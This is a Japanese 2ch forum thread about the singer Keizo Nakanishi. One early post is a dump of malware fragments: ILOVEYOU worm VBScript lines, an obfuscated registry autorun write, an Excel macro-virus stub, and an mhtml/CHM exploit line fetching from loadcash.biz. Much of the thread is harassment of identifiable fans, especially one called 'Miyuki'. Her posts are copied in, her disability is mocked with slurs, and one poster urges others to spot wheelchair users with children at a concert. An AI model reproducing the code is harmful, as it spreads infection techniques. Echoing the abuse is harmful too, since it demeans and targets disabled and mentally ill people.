【もう少し】中西圭三【時間を下さい・・・】 (393) TOP カテ一覧 スレ一覧 2ch元 削除依頼
【遠い】YO-KING Part1【匂い】 (916)
所ジョージはシンガーソングライター (489)
名無しを決めるスレ (737)
m.c.A・Tって知ってる?〜ボンバヘッに共感汁〜 (808)
TOMI YO (119)
木暮"SHAKE"武彦(元REBECCA、RED WARRIORS等) (825)

【もう少し】中西圭三【時間を下さい・・・】


1 :2006/08/13 〜 最終レス :2013/10/22
公式サイト
ttp://www.keizo.jp/

2 :
YOU&Iが好きだった

3 :
携帯公式サイト
http://mediand.jp/keizo

4 :
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

5 :
>3
動画や音声が充実してますね

6 :
>>5
せめてもの「誠意」なんじゃないのかと・・・
豚の時間感覚は「少し」が5年10年単位ですからw

7 :
>>5
本当だ。
いろんなアーティストのサイトをチェックしてるけど、
これほど無料ダウンロードが充実してる携帯サイトは異例。
普通は試聴ならちょっとしか聴けないのにまるまる一曲聴けたりするのも珍しい。

8 :
夏メロ邦楽にスレが出来てるからこっちはいらないよ。

9 :
>>1
過去ログ
中西圭三ファソでてこいや http://makimo.to/2ch/tv3_musicj/1041/1041052142.html
中西圭三 スレッ! http://makimo.to/2ch/ex5_musicj/1077/1077003004.html

氷角BBS
ttp://hpcgi1.nifty.com/icecube/yondemi/res.cgi

10 :
>>10
THX!
明後日の横浜って売り切れたの?

11 :
ファンクラブに入ると優先予約あるそうですが、どの位の優先枠でしょうか?

12 :
▼▲▼処分された医師の実名を晒すスレ▲▼▲
http://society3.2ch.net/test/read.cgi/hosp/1155731818/l50

13 :
http://brokenmemory.blog21.fc2.com/

14 :
>>10 完売らしい

15 :
MTVで観たけどこの人歌上手いね〜

16 :
そうだよ、声と歌はほんとイイ!大好き。
でもたまには・・・3年に1曲でいいから新しい曲聞かせてくれないと欲求不満になっちゃうよ。
今新しい曲サイトから聞けるから飽きるほど聞いてるけど、それなかった時は気が狂いそうだったもん。
今日の横浜行かなかったけど行った人羨ましい。チョンマゲ豚→ぽちゃカワになってたしwデブでもあれなら許すw
氷角えこひいきがなければ問題なく好きなんだけどなあ・・・貞子@名古屋や櫻島大根@西川口なんかスルーでいいんだけど氷角軍団の席順や位置が気に入らないんだよねぇ。
行った人、今日も氷角軍団は最前列に居ましたか?!

17 :
みゆきってウザくない?
氷角掲示板でも浮いてるよ。

18 :

心の病気かアスペルガーと思われ。
さわらぬ神に祟りなしw

19 :
みゆきって自分が行けなかったライブの様子を知りたがって≪誰か報告して!≫って頼む癖して、それの答えに対して全然、お礼というか感謝のレスを返さないんだよね。
心の病とかアスペ云々より、人としての常識の無さや育ちの悪さを感じるよ。

20 :
だって、メンヘル(精神病=心療内科・精神科・神経科の患者)って頭のおかしい人なんでしょ。
そういう病気なんだからしょうがないじゃん。
腹を立てるってことはおかしい人を真人間として扱ってることになるよ。
身障チャンのことを真人間として扱わないでしょ?だからみゆきも人間扱いしなくて桶。
メンヘルって自分のことばっかしか考えないし違う考えや冷静な意見言ったら逆ギレするから手に負えない。
精神疾患のある人間と身障と餓鬼は出禁にすればいいのに。ってか、それプラスブス禁にしたらファンや客数える位しかいなそうw

21 :
本当に基地外・身障・餓鬼・デブス・ヲタは入場禁止にしてほしい、それから独特
のセンスの悪趣味な服を着てくる奴もね、会場で同じ空気吸ってるだけで不愉快
になるから。
ただでさえ他のメジャーアーティストに比べてチケットが不当に割高なのに…
バラードの時に奇声でも発せられた日にぁ迷惑料を請求したくなるよ(実際、過
去にそれでモメたんだろ)。

22 :
障害者って小さい時から特別扱いしてもらって、大人になっても周りの人が手助けしてくれるから、
常に自分が最優先で優遇されるのが当たり前だと思ってるんだよね。
誰かに忠告されても、注意する人は障害者を差別してる奴だと思い込んでいるから聞く耳ももたな
いし。
近所に小児麻痺と軽い知障の女の子が住んでたんだけど、その子が迷子になって帰ってこないって
ことが時々あって、そのたび女の子の母親が「○○ちゃんを探せ!」と指令を出してきて、勿論、
皆で協力して探すんだけど、「うちの子はハンディがあるんだから周りが協力してあたりまえ」と
いう態度だし、見つかってもお礼ひとつ言ってこなかった。
別にお礼を言われたくて探すのに協力してるわけではないけど、誰も口には出さなかったけど嫌な
気分になったもんです。
みゆきの書き込みにもそういう内容のものがあったよね。

23 :
>>21
いや、それ全部出禁にしたら8割方が出禁だからw
>>22
みゆきの書き込みにはまさにソレが見え隠れしてたね。すごい自己中でヒキヲタ管理人がちょっと可哀想になったよ。

24 :
携帯サイト→ファンクラブスを見たら、年末にまたハワイカウントダウンツアー(通称:痛いファンからぼったくるツアー、去年は代金40万+オプション別料金だった)やるらしい。
やはり根性は変わらないってやつですかw

25 :
久々に聞いたら励ますような歌詞が結構あっていいね
でも圭三は作曲中心で作詞は他の人なんだね
自分の昔の歌を聞いてがんばってほしいね

26 :
又、ぼったくりイベントやるんですか!申し訳程度の仕事しかしてない癖して
図々しいにも程がありますね。
元来、FCイベントってのは日頃、応援してる人達に感謝の意味で開催されるも
のなのでは?
会場費程度の金額しかとらない良心的なアーティスト(凄く売れてる人です)
だって居るのに…
こんなんだからまともなファンは皆、去っていってヒキヲタとかメンヘルとか
高齢処女とか障害者しか残らないんですよ。
又、こういう事を書くとヲタが必死になって「君は悲しい人だ」なんて論点が
外れた攻撃してくるだろうけど、誰が聞いてもこっちの方が正論なんだから!
つまんない能書きを考えてる暇があったらきちんと仕事して下さいな。

27 :
そんなの大枚はたいて行く馬鹿が居るから駄目なんだよ。
ぼったくりツアーはKダッシュ時代からの悪習だね、それでローン地獄に陥った
Rず後家のデブスを知ってるよ、どうせ今回も借金して参加だろうね。

28 :
光太郎=みゆき?

29 :
10/1にファンクラブスで岡山ツアーあるみたいね。メルマガでしか配信してないみたいで詳細は分からないんだけど…。
前にメールとか会員情報に書いたはずなんだけど、デブゴリラがなくしたのかな?メルマガうざそうで登録してないんだけど登録しなきゃダメなのかなぁ。
明日から手術の為入院するからデブゴリラでも聴いてすごそうかな。
10/1のは幾らで何するの?

30 :
こんばんは、高橋圭三です

31 :
>>30
どうもどうも

32 :
池田聡のスレってないのでしょうか。

33 :
相変わらずキモイ…
いってきました〜
■みゆき(564) 投稿日:2006年9月23日<土>18時56分/女性
さなさんとたっくんとうちのよしくんと四人で…たださなさんのアクシデントで私もイオンで歩いていたら股関節痛がでて。
さなさんと同じ車椅子を借りて…。
朝 七時半から並び整理券をとり。
やはり車椅子ということで最優先して頂き一列めでライブをみることができました。
琵琶湖依頼でなんかすごく感激しました。
たまたまCDをかいサイン握手会がありました。
圭三さんに携帯電話にサインよしくんは帽子に…さなさんは2ショットを…嬉しかったです〜。
親しみ感がわいて話もはずみました。
また 会えるときを楽しみにしています。
圭三さんにサインもらってるとき唇が震えてました。
また来てくださいね。
と圭三さん やさしいんですよ(^O^)また 会える日を楽しみにしています。

34 :
圭三さん私のこと覚えていてくれていました。
■みゆき(566) 投稿日:2006年9月24日<日>09時54分/女性
今年のチボリは杖を持参していました。チボリもそうですが待ち時間があると結構苦痛なんですよ。
さなさんは膝を脱臼して車椅子になりました。
私は生まれつき股関節のかかり具合いが浅くあと10年日常生活しだいで人工関節になりうる可能性
をしてきされて。
見た目には私はわからないんですよ。
私は当分は杖を活用し 歩けなくなったら人工関節にしてなるべく車椅子は避けたいと…こればかりは。
もつも持たすも自分しだいということかも。
今後 イベントにいくとき ご迷惑をかけると思いますが。m(__)m すいません。

↑読んでるだけでうざいわ〜
カマッテ臭がするというかなんというか

35 :
てのひらいいね

36 :
>>34>>35さんくす!
空気嫁っていいたくなるよね…。みらいよりやばいよこいつ。
みゆきといい身障タソといい、身障特権生かしまくりなのが卑しい。

37 :
氷角掲示板で ふりうりとかいう奴のみゆきに対するレスが笑える。
みゆきの事を気遣ってるようで、実際は皮肉たっぷりなんだもんw

38 :
>>37 PC修理中で見れない私にコピぺして〜!

39 :
今、桃三郎見てきた、ふりうり笑わせてくれるな。
お大事にしてくださいね。なんて書きながらチクリと皮肉ってるじゃん。

40 :
しゃきーん
ぱわわっぷ

41 :
保守

42 :

中西ゲイ三


43 :


44 :
既女板からコピペ
139 :可愛い奥様:2006/10/26(木) 00:25:19 ID:hR5bvLUd
ピンクハウスは昔はヤンキーに人気あったよ。
似合いそうな人に限ってきないで、にあわないような人が好んできてた。
ピンクハウス=ヤンキーが好きてイメージがある。
私も嫌いだな、あの服。

140 :可愛い奥様:2006/10/26(木) 00:26:21 ID:NKw6wJ/a
>>137
トンクス。
確かに自分の美的感性を反映した服が
そぐわない人に着られるのは
作り手として我慢がならないでしょうね。

141 :可愛い奥様:2006/10/26(木) 00:29:38 ID:SmwVVD6S
ピンクハウスは何故か
デザイナーが一番望んでなかった人にしか人気なかったよね。
デブかブス。
モデルさんが着ていると本当に綺麗なのに。

142 :135:2006/10/26(木) 00:34:27 ID:zpO68z0j
ピンクハウスは安い素材(木綿)に韓国で縫製させてる癖して、ぼったくりに近い高額
だから、着てる奴は皆、借金まみれですよ。
余裕で買えるようなお金持ちはあんなヤクザなブラントの服には固執しませんからねw

45 :

>デブかブス
奴はデブで且つブスだから最強だねw
奴が着てるとピンクハウスも土偶にしか見えない。

46 :
>デブかブス
ついでに借金まみれw

47 :
40歳越えてピンクハウス系って絶対メンヘルだと思う。

48 :
>>47
禿同。
ピンクハウスマニア(金子功信者)の人って 容姿の美醜に関わらずメンヘル
が多い気がする。
幼女的、少女的な可愛らしさに固執して 「いつまでも少女の心を失わぬ自分」
を誇示するのに心血と金銭を注いでる感じ。
でも、実際に正体を晒すと西川口みたいに狡猾で自己中で直情的に他人に暴力
ふるったりするんですよね 。

49 :
チラシの裏だけど…
ピンクハウスの金子功って昔はブスには自分の服を売らないって有名だったのに、ここ数年は西川口とか宮川花子みたいな
デブスしか客が居ないじゃん。

50 :
かなり前にピンクハウスにVHS貸して、借りパクされた。
金に限らず、「貸した方が悪い」「嫌な思いをする」のが殆ど 。
美輪明宏が身の上相談でで言ってた【金は貸したらあげたと思え】に頷けるけ
ど、品物まではそうは思えない。
「すぐ返すから!」という言葉を信じて、貸したにも関わらず奴はその好意を
当然と思い込み返済を迫ると逆切れされた。
私が奴の正体を知らなかったのがいけないけど、なんか悲しい…これも美輪
明宏の言葉だけど【人間関係において、金品の貸し借りは絶対にNG】。

51 :

デブスマン


52 :
DQNの四天王
ピンクハウス、貞子、身障チャソ、みゆき

53 :
DQNパラダイスw

54 :
この2人には、もう言うべき言葉も見当たらない。
ほんと、お好きなだけラブラブしててくれって感じだ。
なにしろ、さとちゃんと中西は大学の先輩後輩で、中西はデビュー前、さ
とちゃんのバックコーラスを担当してて……当時のライブビデオでは、中
西の担当パート前に、さとちゃんの「圭三!」と言う声が入っている。
今はすっかり中西に追い抜かれちゃった感じで、さとちゃんを知ってる人
自体信じられないくらい少なくなっちゃったんだけど。
さとちゃんは『濡れた髪のlonely…』でレコ大候補にもなったんだぞーー!
……ま、候補になっただけだけど…(苦笑)
そんなことはどうでも良くてーーー! 本題はこの2人のラブラブ振りなの
だーー!
とにかく、仲がいい。それも初恋同士のような照れ臭そうな仲の良さ。
十数年ものつきあいだろうに、30過ぎの男2人が(しかも片方は×イチ…)
一緒にいると、ほんと、見てるこっちが照れちゃうくらいの雰囲気。
桐原なんてすっかり忘れちゃってる初々しさなんだよねーー。
ありゃ、一生やってるね。あのままだね。
相手がいないときは憎まれ口(?)みたいなことも言ってるのに。
多分、お互いに相当好きなんだと思う。誰も邪魔できないラブラブファイヤ
ー振り。
他の人と喋ってるときは照れ臭そうな感じがないからねーーー。
ICEBOX当時、『ミュージックステーション』に出たときが特に凄かった。
いじっちーもさとちゃん好きっぽかったけど、2人は「池田さん」「圭三」と呼
び合いラブラブファイヤー!
さとちゃんが結構、小悪魔入ってるんだよねぇ。
ゲイの人たちに「歌ってるときがすっごく色っぽい」と力説されただけに、二
枚目じゃないじけど色っぽいし。いじっちーも参っていたんだろうと思う。
紅一点・忍ちゃんも男どもの様子に呆れてる感じだったから。
ICEBOXの頃は、プロデューサー・某A氏(限りなく実名に近い伏字)ともな
んかヤバイ感じあったし。
その昔、さとちゃんはアレンジャーS氏とも……×××××…
桐原は、中西が離婚したのには、さとちゃんの存在も結構あったと思ってる。
高樹沙耶じゃ物足りなかったんじゃないかな。さとちゃんの存在の大きさの
前ではねぇー
ま、今後はカモフラージュ婚(勝手に決めている…)なんぞせずに愛に生き
て欲しいですな。2人とも。くすっ。
↑貞子も真っ青のすげー妄想だなw 圭三のファンってこんな奴ばかりなの?

55 :
>>54にあるのを書いたヤツは隔離しないとヤバイだろ
統合失調症とかじゃねーの?

56 :
コピペパラダイス

57 :
キモい

58 :
>>55
隔離しなきゃいけない奴は他にも沢山いるよ。
ディナーショーでバラード歌ってる時にカン高い声で一緒にハモった婆とか、
ライブ会場のロビーでキモメガネの癖して周りに女(ブスばかり)はべらして
ワザと声高に自分がいかに圭三&そのスタッフと話すニート野郎とか…
>>54 は圭三ファソじゃなくて池田聡ファソっぽいな…
腐女子的な妄想は自分の頭の中だけでやっておくれ。

59 :
ゲイ三ファンには異常者が多いんですね

60 :
中西圭三、ちっゲイとパラダイス。Ticket to Paradise

61 :
DQNおばさんの書き込み
■ こんにちは…テ
■みゆき(584) 投稿日:2006年11月7日<火>20時05分/女性
11月12日 広島三次にてダムの竣工記念ライブにさなさんとたっくんと私とよしくんと行きます。
ただ車椅子なんで…私は手術前だけど筋力を落とせないため松葉杖なんですが。
12日は二台の車椅子で行きます。全席自由席なんで…。
あと数日で圭三さんの誕生日ですね。11日にはたっくんも6歳になります。
たっくん圭三さんと誕生日も血液型も同じで偶然で イベントのときは よくみてもらってます。
よしくんも最近デビューしました。ただよしくんは恥ずかしがりやなんでなかなか…。
いかれるかた 楽しみましょうね
>ただ車椅子なんで…私は手術前だけど筋力を落とせないため松葉杖なんですが。
>12日は二台の車椅子で行きます。全席自由席なんで…。
相変わらずですね。又、身体障害者特権をフルに使う気なんだろうね、意地汚いにも程があるよ。
当日は車椅子で来ている子連れをチェックしましょう!

62 :
本人が特定される書き込みを誰が見てるかも解らないネット上にするなんんて
このおばさんってマジで知障?
『いかれるかた 楽しみましょうね』なんて言ってるけど、自分だけが楽しむ
事しか考えてないよね。
知障おばさんに連れ回される子供が一番の被害者だね。
西川口、貞子、身障チャソ共々、絶対に係わり合いになりたくない人種だ。

63 :
みゆきって教えてチャソで答えが気に食わないと
逆切れや不幸語りを始めたり、返される答えに満足せず、
延々と質問し続ける。
自分が掲示板の雰囲気を悪くしてるという自覚が全然ない。
メンヘルボダなのかな?気持ち悪くて読んでるだけで嫌。

64 :
なんか知らんが
粘着アーティストに粘着なファンばっか
寄り道して損した

65 :
>>60 中西圭三、ちっゲイとパラダイス。Ticket to Paradise
脱帽っす!
でもいつからゲイ三ってゲイキャラになったんだろうねぇ?

66 :
私も12日の行きますよ。
楽しみです(^O^)/

67 :
ダムに何人集まるんだろうな(謎

68 :
10数年位前、この人と追っかけらしき3人組を見た。(仙台駅で)
何がびっくりしたって、追っかけのブサイクぶりにビビった(゚Д゚;)
ピンクハウスにソバージュ頭の人が、私が生きてきた中で
最強にブサかったのを覚えてる。
当時私も別アーの追っかけをしてて、ブサが多くて有名なアーだったけど
そいつら位ブサイクな追っかけはいなかった。マジで衝撃的だった。

69 :
で、ダムに何人集まった?
ひょっとしてカラオケダムの間違いとかじゃないよね?(爆

70 :
………
最近…私 圭三さんの…
■みゆき(591) 投稿日:2006年11月18日<土>11時31分/女性
ストーカーだといわれちゃいました。
毎日ももさぶろう〜ファンクラブサイトにアクセスしてライブ確認とかして。
だからすでに 来年関東のシーズンズのチケット四枚各所一枚で… 主催者から送付してもらったけど
FCでの割引優先があるとわかり…おっちょこちょいです。年内には股関節両足手術をして来年復活
1月13日〜いきます 月1しかいけないけど3月のみ10 11と。それを支えに手術頑張ります〜。
私 圭三さんのライブに行きたいだけです。
ストーカーではないです。
私 やはりストーカーなんでしょうか?圭三さんには嫌われたくないから。

71 :
変なブログの転載すな、ボケ

72 :
多分↓ココのBBSを転載してるんでしょう。
http://hpcgi1.nifty.com/icecube/yondemi/res.cgi

73 :
中西圭三、「ケツ借そう(結晶)」リリース。
     

74 :


75 :


76 :
みゆきって何で改行しないの?
すげー読みにくいよ。

77 :
>>76 読む気があるだけキミは凄いな

78 :
相変わらず、デパートの催し物とか祭りの余興の仕事しかないんだなw

79 :
どなたか詳しい方、教えてください。
「HAPPY EVER AFTER」
のシングルの写真、圭三さんがつけている時計は
ロレックスエクスプローラですか?

80 :
悪人ヅラ
ttp://img.blogs.yahoo.co.jp/ybi/1/96/b1/capital_village/folder/254805/img_254805_24622695_0?20061201133115

81 :
あらーまだ細かった頃じゃないのー。
今は見る影もないけどw

82 :
中西って、高木なんたらと結婚してから、坂道を転げるように落ちていったね
高木なんたらっていうのが、下げマンだったのかな

83 :
さげまんなんじゃなくて、多分
中西自体がドアホだったんだよ。
きっとね・・・。

84 :
ヘタレ豚象age

85 :
まじで誰と結婚したんだっけ?

86 :
沙耶のいる部屋

87 :
エコライブ観に行く人いる?

88 :
エコライブ仙台観に行く人いないのかな?

89 :
エコライブ行ったよ。みんなコイツ誰?的な空気だったけど

90 :
少しは痩せたか?
ゲイゾウ?

91 :
高樹沙耶と結婚してから人気が無くなって、離婚→引きこもりで過去の人。

92 :
時代の流れを感じるな。
http://www.youtube.com/watch?v=dIyMOadzOA0

93 :
米倉利紀と「どっちがファンキーか」で喧嘩したんだよな。

94 :
デビュー記念日だから来てみたら閑散としてますね。
>>93
レーベルが一緒の頃は「子供作りました」なんていってた癖にw
所詮おネエ同士だからうまくいかなかったのでは?

95 :
老害ヲタファンしか居ない奴のスレが賑う訳ねーだろw
圭三自身が一番の老害なんだけどなw

96 :
老害・・・

97 :
老害age

98 :
中西圭三さんが乗ってるクラシックカー分かる方教えて下さいm(_ _)m

99 :
高木沙耶と何発かやれたんだからもういいだろ

100 :
保守age
貞子とピンクハウスが居ないとここも静かだね。

101 :
もはや「貞子(名古屋/精神病)」「ピンクハウス(西川口/風俗」「キモヲタ(氷角)」の名前は定着したんだねw

102 :
今、圭三主演の「猿の惑星」やってるねw

103 :
>>101
二人は凄く似ていると思うよ。
視野が狭い・育ちの悪さが顔に出てる・ブスの癖に高価な物を身につけたがる
似すぎているから近親憎悪でいがみ合ってるのかも知れないが…

104 :
>>103
言える!
ついでに精神病で引きこもり・ニートな所も。
最近豚のお気にの彼女見ないね。

105 :
既女スレよりコピペ
201 :可愛い奥様:2007/08/13(月) 11:23:04 ID:cpAW4VCh0
ユーミンのラジオに来たハガキに塾の先生の弟?が売れない歌手なので
かけて上げて下さい。
と言うのがあって「かけて欲しかったらここまでのし上がって来い」みたいな返事だった。
それが中西圭三で、その後売れてラジオで曲をかけてもらえた。
私のあの一言があったからがんばれたのでは?って言ってた記憶が。

106 :
過去に猿魂(去る魂?)に入ってたからって
今もファンであると思わないでほしぃ・・・。
なんで今更ライブ告知ハガキがくるのかしらん??

107 :
もはや時の人って感じ。
『いたなぁ〜』ぐらいの。

108 :
イタい人達(ピンクハウス、貞子、キモヲタ軍団、身障)が最前に陣取ってるライブなんて
金積まれてもいかないよ!

109 :
http://society6.2ch.net/test/read.cgi/hikari/1131196228/l50
有線サウンドプラネット被害者の会

110 :
歌一本、ギター一本の一本道って言うけど
一人分しかギャラが出ないからでしょ?

111 :
今でも俺は圭三くんの歌を聴いてる
秋風が届く頃には
たったひとつの愛を
が似合いそう
今日は
君がいる星
を聴く

112 :
テイクトゥパラダイスあれよかったなー俺のマイベスト八位だな

113 :
>>111
>>112
すべて懐メロですよねw
21世紀に入ってからの曲を語り合いたいけど…無理ですよねww
ようするに豚三は過去の人だって事をファン自身が認めているんですよwww

114 :
まぁいいじゃん
パワパワ言ってれば。
歌ってる本人はパワーないけどwww

115 :
ベスト版連発するくらいなら、
昔wowowやNHK-BSで放送したライブをDVDで出してくれよ。
買うからさー。

116 :
まさに青い影

117 :
>>115
そんな需要のない商品は出せないよw

118 :
>>115
俺も買うよ。クワトロでのライブだっけ?

119 :
勘違いすると困るけど、
でぶってない全盛期のが欲しいね。

120 :
えっ!今そんなにメタボ?
しばらく露出してるの見てないけど・・・。

121 :
あわわあわわあんわっ!

122 :
>120 UFO呼ぶおっさんみたい

123 :
結局、ゲイということでFA?

124 :
女に相手にされないからってゲイになるなんて最低最悪ですね。

125 :
あんだよ、いいじゃないかよ。高樹は酷すぎた。利用してからポイと捨てすぎ。
デブサで気弱なゲイって大好きだ。

126 :
金スマで、前妻、高樹が出るね

127 :
圭三さん、見てたら抱いて!

128 :
高木沙耶が金スマ出たけど、高木の過去をやったんだけど
中西と結婚してなかった事になってる様にスルーされてたよ?
なんで?結婚後一切中西メディアから消えた感じだし、
一体結婚生活に何があったのか、気になる。

129 :
今「ぶらり旅」で懐かしい声が聞こえたと思ったら中西さんでした。
今の曲?あんま変わってない印象でした。

130 :
>>128
実況でも「中西はスルーか?」とか「圭三は?」とか
「結婚してたことは黒歴史か」「なんだこの女」とか
さんざんな言われようだったよ。

131 :
社長との不倫は言ってたのにね。

132 :
251 :可愛い奥様:2007/11/02(金) 15:27:29 ID:mjHTNawAO
ライブで客電が落ちた途端に狙いすましたように人かきわけて前に行く奴。
行こうとして行った癖に不可抗力みたいに前に行けちゃったの〜とか言ってるし。
確かに今はそういう奴が多くて当たり前になってるのかもしれないけど、チッタやクアトロ出来た頃散々洋楽ライブ行ってた私に言わせれば後ろから押されはしたけど割り込みなんぞそんなになかった。
恥ずかしげもなく整理番号3桁でも前に行けんですよ〜とか言ってる奴、それがデフォ化しててもやってることはアンタらが普段バカにしてるババアの割り込みと同じなんだよ。

133 :
中西のスコア出とる?

134 :
ぱわわ・ぷ体操

135 :
ホモだったから結婚歴を元嫁になかったことにされたのかな。

136 :
ホモのわりに結婚報道の時やたらキスしてたよね。
かなり苦痛だったのかな?
それとも結婚後に目覚めたのかしら・・・。

137 :
結婚式の時、あんまりうれしそうじゃいみたいに見えた。
うれしそうな振りしてるみたいな。

138 :
この人ってホモなの?

139 :
>137 えーーーすっごいラブラブで、やきもちやいたけどなー

140 :
高樹と結婚なんて、がっくりした記憶がある。
見た目にヨワイ人だったんだ〜って。
だって、どう考えたって高樹って性格悪じゃん。
今は、田舎暮らしのよれよれオバハン。

141 :
徹子の取調室に出てたねえー
また黒歴史にされたのかなー
見るのが楽しみ

142 :
保守

143 :
2007年末、NHKおかあさんといっしょの「ぼよよん行進曲」を一緒に作った作詞家の田角有里さんと入籍。

144 :
よかったね、圭三。
これでバリバリ仕事やって、ジャニーズの曲を作って大儲けのGajin (なかむー)
みたいになってくれなきゃ又、逃げられるよw

145 :
ネタかと思ったけど本当なんだ!
おめでとう、圭三。
残念だったねwww 貞子、ピンクハウス、身障チャソ、みゆき。

146 :
おめでとぉー!!

147 :
びっくりしたけど圭三さんおめでとう!
>>144 さんの書き込みを読んでもっとびっくり!SMAPやNEWSの曲を作ってる
Gajinって中村雅人さんのことだったんですね。

148 :
婚姻届は12/31に出すと、たった1日なのに 365日養ったことになり税金が安くなるという生活の知恵www

149 :
おめでとう!
ttp://www.oricon.co.jp/news/confidence/50950/full/
【音楽】中西圭三、作詞家の田角有里さんと再婚 「“ぼよよ〜ん”と笑顔で歩いてゆきたい」[01/04]
http://news24.2ch.net/test/read.cgi/mnewsplus/1199405462/

150 :
貞子哀れだな…

151 :
↑ ピンクハウス乙

152 :
メンヘル婆乙加齢

153 :
圭三さん、おめ!

154 :
サラクルーの有り難い御言葉
判断力の欠如で結婚し、忍耐力の欠如で離婚し、記憶力の欠如で再婚する。


155 :

アルマン・サラクルー(Armand Salacrou フランス、劇作家)

156 :
今頃、名古屋の貞子狂ってるんだろうなwww

157 :
>>148
そういうとこだけは知恵が働きそうだ
相手は何歳なんだ?

158 :
>>156
ピンクハウス乙


159 :
ここだけの話、一番発狂してるのは身障チャソだと思いますよ。

160 :
田中有里さんってどんな人?知ってる人いますか?
検索してもでてこない。。。

161 :
895 :可愛い奥様:2008/01/17(木) 13:04:01 ID:SO09+LPf0
ピンクハウスを着てるオバサン。
今も店舗があるのか?いったい何年着てるのか。
あれを着てしまうセンスを疑う。
デブもガリもピンクハウスを着てる人の容姿は超絶ブry
897 :可愛い奥様:2008/01/17(木) 13:07:12 ID:utvvpuKB0
ピンクハウスって今でもあったのか
899 :可愛い奥様:2008/01/17(木) 13:13:31 ID:z+sYCNtu0
あるよ。見ないで済んでるなら羨ましい。
職場のオバさん(40歳ぐらい)が毎日着てるのを見せられるのは正直つらい。
どうしてピンクハウス好きの人ってノーメイクで眉まで手入れしてない人が多いんだろ。
904 :可愛い奥様:2008/01/17(木) 13:29:39 ID:bjTPeD4P0
>>899
同意。昔知り合いだった毒女もピンクハウスが好きで
ピンクハウス専用のポイントの溜まるクレジットカードまで
作ってクレジットでピンクハウスを買ってたw
ビア樽みたいなピザでノーメイク、眉の手入れもしていない。
ピンクハウスのスカート履いてると、見知らぬオバちゃんから
そのスカート可愛いわねって褒められるんだってw
客観的に自分のことを省みずに可愛いお姫さまになれんだろうなw
ピンクハウス似合う人なんて、吉川ひなのか上原さくら、ショコタン
くらいだろうが。

162 :
905 :可愛い奥様:2008/01/17(木) 13:31:27 ID:ZXLURynu0
>>904
ひなのって声がばばくさいし、顔もしわっぽい。
あと数年したらひなのも、ピンクハウス好き婆になるんだと思う。
907 :可愛い奥様:2008/01/17(木) 13:36:15 ID:lie0xj670
>ピンクハウス似合う人なんて、吉川ひなのか上原さくら、ショコタン
くらいだろうが。
宮川花子も何気に似合うと思う。
908 :可愛い奥様:2008/01/17(木) 13:36:29 ID:pGQKRwjM0
ピンクハウスって客にピザが多いから、
スカート2着買ったら1着にお直ししてくれるって聞いて笑ったw

163 :
ピンクハウスって客にピザが多いから、
スカート2着買ったら1着にお直ししてくれるって聞いて笑ったw

wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

164 :
「Standards」と「Standards2」がAmazonで8位13位に急上昇しちゃってるんだけど何かあったの?!

165 :
>>161-163
貞子って本当に暇人だな。
ヒキだと時間が有り余ってるからネットに張り付いていられるんだ、ある意味羨ましいよ。

166 :
>>164
それは保志

167 :
3/19にやっとメジャーで新譜出せるんだね。
もっとも途中下車テーマ曲の寄せ集めだけど…。

168 :
作詞家と結婚したね
30日報告しておりますた

169 :
>>167
レーベル変わってたね
1月に情報出て予約も受付になってるのに
公式サイト、なんで情報載せないんだろ?

170 :
>>168
そういえば前妻もビーイング系アーティストの作詞をしてたねw

171 :
Choo Choo Train

172 :
とっくの昔にFCなんて脱会してんのに何でライヴの案内葉書がくる訳?
そんなに集客に困っているのかしらw

173 :
前回の結婚式の時の取材で
やたら「事務所の人にいい奴だからと勧められて」と
お互いに言ってたことが印象的だった。
その後のお二人の活動をみると
周りに翻弄されながら自分に嘘をつかずに生きて行こうという
そんな感じがしてたが。

174 :
>>172
二行目、大正解だね。
中西ではないが、某バンドのFCからそんなはがきが来たことがある。
ライブの案内だけでなく、今ならFCに入会金ナシで再入会できます
とも書いてあった。退会してから五年以上経ってんのにw

175 :
ブラックビスケッツのタイミングって中西圭三作曲したらしいね
いまさらながらマジで驚いた
かなり才能あるとオモタ
この人が表舞台に出てこないのはもったいないよ

176 :
オババの追っかけさん乙w
もう売れることなんて一生ないからワザとらしい書き込みは止めてねw

177 :
誰かと勘違いしてる?
ここに俺が書き込んだのは初めてだよ
ブラックビスケッツのファンだったから着うた探してたら、
カバー曲の中西圭三着うたにたどり着いてタイミングが中西圭三作曲だと知った
中西圭三の曲は代ゼミのCMソングと最後の雨ぐらいしか知らないけどね
当時ちょうど受験生だったから

178 :
最後の雨ておい

179 :
それは…中西保志

180 :
銀座のLIVEについては何もないのかねちみたち
ラジオで告知聴いた16年前のファンより

181 :
>>179
誰それ

182 :
最後の雨の人

183 :
ニッポン放送に今日出るよ。もうすぐ。

184 :
貞子発狂www

185 :
貞子=名古屋の精神病オバサン

186 :
ピンクハウス=西川口のピザな風俗勤務の割り込み婆

187 :
身障タソ=リュックサックと雑草で作った花束が目印の知障ストーカー

